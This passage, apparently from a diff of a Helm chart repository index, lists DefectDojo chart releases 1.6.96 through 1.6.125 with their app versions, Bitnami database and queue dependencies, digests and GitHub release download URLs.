https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.33.7/defectdojo-1.6.125.tgz + version: 1.6.125 + - apiVersion: v2 + appVersion: 2.33.6 + created: "2024-04-26T04:00:46.474913767Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: fd8dda598cbdcddcb8b1dc3923fb035fb1cb4f3326f58f2a9965b2b027ca8871 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.33.6/defectdojo-1.6.124.tgz + version: 1.6.124 + - apiVersion: v2 + appVersion: 2.33.5 + created: "2024-04-22T14:49:14.242177002Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1691d7d742783b57dac1d7e53e4fe1046e0c58ad92adae9b91598317b0def4ed + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.33.5/defectdojo-1.6.123.tgz + version: 1.6.123 + - apiVersion: v2 + appVersion: 2.33.4 + created: "2024-04-17T20:17:55.854852356Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 06bb22e3fb999e526f449ae7b9a4ddee69c3661ac67d9c88829aba0d8b57a116 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.33.4/defectdojo-1.6.122.tgz + version: 1.6.122 + - apiVersion: v2 + appVersion: 2.33.3 + created: "2024-04-16T23:20:09.019831998Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 50c0f5dd9bcbaee1e2534798d1c395b7ae3e0ed8a9dcf3db6bc7782822a93e83 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.33.3/defectdojo-1.6.121.tgz + version: 1.6.121 + - apiVersion: v2 + appVersion: 2.33.2 + created: "2024-04-15T18:34:55.67495226Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e20b6f4cd7ca309dc3f914285d8e19c8de8d6a45c1234f362b581b5327787f5e + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.33.2/defectdojo-1.6.120.tgz + version: 1.6.120 + - apiVersion: v2 + appVersion: 2.33.1 + created: "2024-04-08T16:50:23.215955637Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a6996286963c431c5e260583d16db3af1cbad28f45616d6208d6656dffee76ac + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.33.1/defectdojo-1.6.119.tgz + version: 1.6.119 + - apiVersion: v2 + appVersion: 2.33.0 + created: "2024-04-02T18:38:42.147748403Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~15.1.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~19.0.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 096a1d5deec3ed6b0a3c32e50d1a7266efa5a2fef0aca0759f564f6b51794a52 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.33.0/defectdojo-1.6.118.tgz + version: 1.6.118 + - apiVersion: v2 + appVersion: 2.32.3 + created: "2024-03-25T18:55:52.252201649Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~11.9.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~16.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 6bf6dce476913ce9e3a7018d358c2689ddf70319567f5c094b7623c3a6e92fc7 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.32.3/defectdojo-1.6.117.tgz + version: 1.6.117 + - apiVersion: v2 + appVersion: 2.32.2 + created: "2024-03-18T19:01:11.040736566Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~11.9.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~16.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 85418096cabb39b17687460dffd6eb816f4f3c4af50eea56d4308b7be8ec3305 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.32.2/defectdojo-1.6.116.tgz + version: 1.6.116 + - apiVersion: v2 + appVersion: 2.32.1 + created: "2024-03-11T21:56:23.729169777Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~11.9.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~16.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c6ef4755b9d8afd555f06047c139e56da974a06031d0cbb15e9117ea501d5b12 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.32.1/defectdojo-1.6.115.tgz + version: 1.6.115 + - apiVersion: v2 + appVersion: 2.32.0 + created: "2024-03-04T20:53:21.531320519Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: https://charts.bitnami.com/bitnami + version: ~9.19.0 + - condition: postgresql.enabled + name: postgresql + repository: https://charts.bitnami.com/bitnami + version: ~11.9.0 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: https://charts.bitnami.com/bitnami + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: https://charts.bitnami.com/bitnami + version: ~11.16.0 + - condition: redis.enabled + name: redis + repository: https://charts.bitnami.com/bitnami + version: ~16.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 4a2ca83aae887aa303fd64992016bac8f730ae6ebb09e4efa96e3613f27fc69b + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.32.0/defectdojo-1.6.114.tgz + version: 1.6.114 + - apiVersion: v2 + appVersion: 2.31.5 + created: "2024-03-01T03:19:03.574401764Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e2b4176f40f20cb124533f7c8e7006332270f285fc9def77e5a57492545076d2 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.31.5/defectdojo-1.6.113.tgz + version: 1.6.113 + - apiVersion: v2 + appVersion: 2.31.4 + created: "2024-02-26T18:55:31.86155821Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.4.0 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e2088226a0fd8cb853134743cb1c387752e66ced827982ba9145f445323c5e77 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.31.4/defectdojo-1.6.112.tgz + version: 1.6.112 + - apiVersion: v2 + appVersion: 2.31.3 + created: "2024-02-22T20:46:54.098889034Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0bcc9c4a5805da990f960e021d7c7a9fe11779e60e8b2c5b89479292aa033017 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.31.3/defectdojo-1.6.111.tgz + version: 1.6.111 + - apiVersion: v2 + appVersion: 2.31.2 + created: "2024-02-20T19:51:54.29116611Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: babbbc92905558ff2a51a3f5eb18d508cc8b02f6eb48c40b17496e63c7f60e08 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.31.2/defectdojo-1.6.110.tgz + version: 1.6.110 + - apiVersion: v2 + appVersion: 2.31.1 + created: "2024-02-12T20:07:22.185224605Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3eb97f037708be8b693712d0293552fd59652c9521a01a24c1809be8d3b133a3 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.31.1/defectdojo-1.6.109.tgz + version: 1.6.109 + - apiVersion: v2 + appVersion: 2.31.0 + created: "2024-02-06T00:00:49.255669708Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ce3a51dda626e086da3c2027d1dc4ceb2cedb90d27cae776db6e807f4622ddc0 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.31.0/defectdojo-1.6.108.tgz + version: 1.6.108 + - apiVersion: v2 + appVersion: 2.30.4 + created: "2024-01-29T15:49:47.112069713Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e09cf2f20e8ac2062766fd3a14cb84d85ea583b5460621f3f948f32cbeddf104 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.30.4/defectdojo-1.6.107.tgz + version: 1.6.107 + - apiVersion: v2 + appVersion: 2.30.3 + created: "2024-01-22T16:30:18.180311373Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 7e376053ef22a120ed96b14dd654acf82d15cd7e2028cd28a086f597acd89b71 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.30.3/defectdojo-1.6.106.tgz + version: 1.6.106 + - apiVersion: v2 + appVersion: 2.30.2 + created: "2024-01-16T16:54:07.805506929Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 10fa3baa624f2a4f225960f50771e6fe803bf037ff7765482c50bf15aac44848 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.30.2/defectdojo-1.6.105.tgz + version: 1.6.105 + - apiVersion: v2 + appVersion: 2.30.1 + created: "2024-01-08T16:56:00.122092377Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3d5b85c6b42c166bf6ef7be8361a20fd4d908acd93f2ba236381ff47ed9fe59a + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.30.1/defectdojo-1.6.104.tgz + version: 1.6.104 + - apiVersion: v2 + appVersion: 2.30.0 + created: "2024-01-02T18:19:58.270140341Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1403013f9b489ba8059d55c4c9af4648c739de837b944145a468795673f1dc78 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.30.0/defectdojo-1.6.103.tgz + version: 1.6.103 + - apiVersion: v2 + appVersion: 2.29.4 + created: "2023-12-26T15:48:48.428319797Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a44fa71a8441f609dcfe480aec41812cc6d99285fcead8c20686a7e327a21bd9 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.29.4/defectdojo-1.6.102.tgz + version: 1.6.102 + - apiVersion: v2 + appVersion: 2.29.3 + created: "2023-12-18T15:09:07.371932578Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: df0654f32efb3f599b2a6dcfc644d43ea9698df72b77800ff08d0f62876c1e01 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.29.3/defectdojo-1.6.101.tgz + version: 1.6.101 + - apiVersion: v2 + appVersion: 2.29.2 + created: "2023-12-11T17:14:22.607642891Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 06d5097a3ce42db3da8344a77173289492e8ec90666f9caeafc98c6ac45bea23 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.29.2/defectdojo-1.6.100.tgz + version: 1.6.100 + - apiVersion: v2 + appVersion: 2.29.1 + created: "2023-12-04T18:43:38.726620317Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 51cb6085206581b5a15d2ca55c36986b588e633a0646a61dd09d1384b5b9b774 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.29.1/defectdojo-1.6.99.tgz + version: 1.6.99 + - apiVersion: v2 + appVersion: 2.29.0 + created: "2023-12-04T16:10:22.355819829Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 015c94303dd00e39084305b98327d6859a8601aeefef04473bfb4c1cc408950c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.29.0/defectdojo-1.6.98.tgz + version: 1.6.98 + - apiVersion: v2 + appVersion: 2.28.3 + created: "2023-11-27T18:57:50.053983082Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 020a351d027fc025bc5b9e1b43edaef2c6549d81f62d7a7a8091c2856bb9a95c + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.28.3/defectdojo-1.6.97.tgz + version: 1.6.97 + - apiVersion: v2 + appVersion: 2.28.2 + created: "2023-11-20T16:17:43.789121254Z" + dependencies: + - condition: mysql.enabled + name: mysql + repository: '@bitnami' + version: ~9.1.7 + - condition: postgresql.enabled + name: postgresql + repository: '@bitnami' + version: ~11.6.5 + - alias: postgresqlha + condition: postgresqlha.enabled + name: postgresql-ha + repository: '@bitnami' + version: ~9.1.5 + - condition: rabbitmq.enabled + name: rabbitmq + repository: '@bitnami' + version: ~11.2.0 + - condition: redis.enabled + name: redis + repository: '@bitnami' + version: ~16.12.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 6d6676b4457b275f4453fa8ed080adb241f586f6c895213824b0469a9f257c22 + icon: https://www.defectdojo.org/img/favicon.ico + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.28.2/defectdojo-1.6.96.tgz + version: 1.6.96 + - apiVersion: v2 + appVersion: 2.28.1 + created: 